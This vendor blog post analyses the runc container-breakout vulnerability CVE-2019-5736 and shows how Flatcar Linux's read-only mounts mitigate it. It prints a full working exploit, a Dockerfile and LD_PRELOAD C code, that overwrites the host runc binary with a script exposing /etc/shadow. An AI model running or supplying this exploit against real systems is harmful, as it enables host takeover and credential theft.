runc “breakout” Vulnerability Mitigated on Flatcar Linux
Last week, a high severity vulnerability was disclosed by the maintainers of runc, under the name CVE-2019-5736: runc container breakout. This vulnerability has high severity (CVSS score 7.2) because it allows a malicious container to overwrite the host runc binary and gain root privileges on the host. According to our research, however, when using Flatcar Linux with its read-only filesystems this vulnerability is not exploitable.
runc vulnerability background
In the context of our security work, we had been asked to evaluate the report’s severity with respect to the client’s installation. In the course of this evaluation, we wrote an exploit in order to understand how it works and to test if their installation was vulnerable. While we did recognize the severity of the issue, we also ascertained that the client was not affected. To understand this, let’s take a look at how things should work versus what could happen if the exploit was successfully executed.
How containers should work
Let’s first look at the following diagram showing how runc should work.
runc forks a new process that becomes the pid1 of the container. Following the
traditional fork/exec Unix model, that process is so far only a copy of the
parent process and therefore still runs the “runc” program. /proc/self/exe
points to runc while running in the container.
Then, pid1 executes the entrypoint in the container, meaning the running runc program is replaced by the program from the container.
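The fork/exec behaviour described above can be observed with a small, harmless program. The following is only a minimal sketch, not part of runc or of our exploit: the helper names current_exe and child_shares_exe_until_exec are made up for illustration, and it assumes a Linux system with /proc mounted. It forks a child and checks that, as long as the child has not called exec, its /proc/self/exe still names the parent's binary.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper: resolve /proc/self/exe into buf.
 * Returns the path length, or -1 on error. */
ssize_t current_exe(char *buf, size_t size)
{
    assert(buf != NULL && size > 1);
    ssize_t n = readlink("/proc/self/exe", buf, size - 1);
    if (n >= 0)
        buf[n] = '\0';   /* readlink() does not terminate the string */
    return n;
}

/* Fork a child and report whether, before any exec, the child's
 * /proc/self/exe names the same binary as the parent's.
 * Returns 1 if identical, 0 if different, -1 on error. */
int child_shares_exe_until_exec(void)
{
    char parent_exe[4096];
    if (current_exe(parent_exe, sizeof parent_exe) < 0)
        return -1;

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char child_exe[4096];
        if (current_exe(child_exe, sizeof child_exe) < 0)
            _exit(2);
        /* No exec has happened yet, so the link is unchanged. */
        _exit(strcmp(parent_exe, child_exe) == 0 ? 0 : 1);
    }

    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    switch (WEXITSTATUS(status)) {
    case 0:  return 1;
    case 1:  return 0;
    default: return -1;
    }
}
```

In the runc case, the child is the container's pid1 and the shared binary is runc on the host, which is why the window between fork and exec matters.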
How our runc exploit works
The runc exploit code changes the normal behaviour in the following ways:
- Instead of executing our own program in the container, we set the entrypoint to /proc/self/exe, meaning runc will run runc again. So /proc/1/exe will be a reference to runc for a longer time.
- However, we don’t want to run the runc code. With LD_PRELOAD, we will execute a routine that will sleep for a few seconds in order to keep the reference /proc/1/exe for the next step.
- During those few seconds, we have enough time to enter the container with runc exec and open a reference to /proc/1/exe, while it is still pointing to runc (file descriptor 10 in our exploit).
- At this point, we cannot open runc in read-write mode because pid1 is still running runc. We would get the error “text busy” if we tried.
- The sleep in pid1 terminates and executes something else (another sleep but via /bin/sh so pid1 does not lock runc).
- Finally, we have a temporary read-only file descriptor to the runc binary on the host filesystem and we use tee /proc/self/fd/10 to acquire a new file descriptor in write mode and to overwrite the runc binary.
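The last step relies on a general Linux behaviour: opening an entry under /proc/self/fd performs a fresh open of the underlying file, so a read-only descriptor can be turned into a writable one if the file itself permits writing. The sketch below illustrates only that mechanism on a scratch file chosen by the caller. It is not our exploit, and the function names reopen_for_write and demo_reopen are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Reopen the file behind a read-only descriptor for writing by going
 * through its /proc/self/fd entry. Returns a new descriptor or -1. */
int reopen_for_write(int ro_fd)
{
    assert(ro_fd >= 0);
    char link_path[64];
    snprintf(link_path, sizeof link_path, "/proc/self/fd/%d", ro_fd);
    /* open() on the magic link is a fresh open of the target file,
     * so the requested access mode is checked again from scratch. */
    return open(link_path, O_WRONLY | O_TRUNC);
}

/* Harmless demonstration on a scratch file: returns 1 if data written
 * through the reopened descriptor is visible through the original
 * read-only one, 0 if not, -1 on error. The scratch file is removed. */
int demo_reopen(const char *scratch_path)
{
    assert(scratch_path != NULL);
    int fd = open(scratch_path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0)
        return -1;
    if (write(fd, "original", 8) != 8) {
        close(fd);
        return -1;
    }
    close(fd);

    /* This plays the role of "file descriptor 10" in the steps above. */
    int ro_fd = open(scratch_path, O_RDONLY);
    if (ro_fd < 0)
        return -1;

    int rw_fd = reopen_for_write(ro_fd);
    if (rw_fd < 0) {
        close(ro_fd);
        return -1;
    }
    const char msg[] = "overwritten";
    ssize_t written = write(rw_fd, msg, sizeof msg - 1);
    close(rw_fd);

    /* Read back through the descriptor that was opened read-only. */
    char buf[32] = {0};
    ssize_t got = read(ro_fd, buf, sizeof buf - 1);
    close(ro_fd);
    unlink(scratch_path);
    if (written != (ssize_t)(sizeof msg - 1) || got < 0)
        return -1;
    return strcmp(buf, msg) == 0;
}
```

In the exploit, tee plays the role of reopen_for_write, and the target is the host's runc binary rather than a scratch file. The reopen only succeeds once no process is executing the binary any more and the filesystem holding it is writable.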
Our exploit container image is simply an LD_PRELOAD program:
FROM fedora:latest
RUN ln -s /proc/self/exe /exe
RUN dnf install -y gcc
RUN mkdir -p /src
COPY foo.c /
RUN gcc -Wall -o /foo.so -shared -fPIC /foo.c -ldl
ENV LD_PRELOAD=/foo.so
CMD [ "/usr/bin/sh" ]
Here is the source code:
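#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Runs automatically when foo.so is loaded, before main(). */
static void __myinit(void) __attribute__((constructor));

static void __myinit(void)
{
    int pid;

    /* Keep the shells started below from loading foo.so again. */
    unsetenv("LD_PRELOAD");

    pid = getpid();
    if (pid == 1) {
        /* Container init: keep /proc/1/exe pointing at runc for a while. */
        printf("I am pid 1. Sleeping 3 seconds...\n");
        sleep(3);
        /* Then exec something else so that pid 1 no longer runs runc. */
        printf("I am pid 1. Sleeping forever...\n");
        execl("/bin/sh", "sh", "-c",
              "/bin/sleep 1000",
              (char *) 0);
        exit(0);
    }

    /* Any other pid: we entered the running container via exec. */
    printf("I am pid %d. Starting Hijack...\n", pid);
    /* Open fd 10 on /proc/1/exe while it still points to runc, wait until
     * pid 1 has moved on, then overwrite runc through /proc/self/fd/10. */
    execl("/bin/sh", "sh", "-c",
          "exec 10< /proc/1/exe ; "
          "echo Lookup inode of /proc/1/exe: ; "
          "stat -L --format=%i /proc/1/exe ; "
          "echo sleep 4 ; "
          "sleep 4 ; "
          "printf '#!/bin/sh\\ncp /etc/shadow /home/ubuntu/\\nchmod 444 /home/ubuntu/shadow\\n' | tee /proc/self/fd/10 > /dev/null ; "
          "echo done ; ",
          (char *) 0);
    exit(0);
}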
This program is a single function compiled into foo.so and loaded via the environment variable $LD_PRELOAD. It is executed both as the initial process in the container (pid 1) and whenever a process enters the container with docker exec. If it is running as pid 1 (if (pid == 1)), it runs the red part of the diagram above. If it is running via docker exec, it runs the bottom part of the diagram above.
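The reason a single function is enough is the constructor attribute: the routine runs as soon as the object is loaded, before main() of whatever program was started. The following minimal sketch isolates that mechanism without any of the exploit logic. The names role_for_pid, pick_role and role_selected_at_load are hypothetical and only serve the illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* Role chosen by the constructor; stays "unset" only if it never ran. */
static const char *selected_role = "unset";

/* Hypothetical helper: map a pid to the branch the preloaded
 * routine would take. */
const char *role_for_pid(pid_t pid)
{
    assert(pid > 0);
    return pid == 1 ? "init" : "exec";
}

/* Runs automatically when the object is loaded, before main(). */
__attribute__((constructor))
static void pick_role(void)
{
    /* Drop the variable so child processes are not preloaded too. */
    unsetenv("LD_PRELOAD");
    selected_role = role_for_pid(getpid());
}

/* Lets ordinary code check what the constructor decided at load time. */
const char *role_selected_at_load(void)
{
    return selected_role;
}
```

Built with -shared -fPIC like foo.so and listed in LD_PRELOAD, the constructor would run inside every dynamically linked program started with that environment. Linked into a normal executable, it simply runs before main().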
Running the exploit on Ubuntu
When trying this on Ubuntu, we can overwrite runc on the host. When executing the exploit, /usr/bin/docker-runc is overwritten by the malicious script that copies the password file /etc/shadow from the host, making it available for others to read.
Trying the exploit on Flatcar Linux
Then, we tried the same exploit on Flatcar Linux and we couldn’t reach the same result.
Flatcar Linux mounts /usr in read-only mode, protecting most programs from being overwritten. However, this test does not use runc from /usr/bin/runc but from /run/torcx/unpack/docker/bin/runc (managed by torcx). But torcx also uses a read-only mount for the programs, so it is protected the same way.
Conclusion
As we have demonstrated, the read-only filesystems feature of Flatcar Linux is capable of mitigating this runc vulnerability. It can also help against similar exploits of this class. In addition, Flatcar Linux delivers updates automatically, including security fixes. These are some of the reasons we are pushing Flatcar Linux forward and using it as the base for our upcoming open source products.
Since we developed our own exploit, the researchers who found this vulnerability and the maintainers of runc have also published theirs, which works in a similar way:
- https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html
- https://groups.google.com/a/opencontainers.org/forum/#!topic/dev/RFURhHE8FD4
If you want to learn more about Flatcar Linux, head over to flatcar-linux.org.
If you need help with security assessments, penetration testing, or engineering services, contact us at [email protected].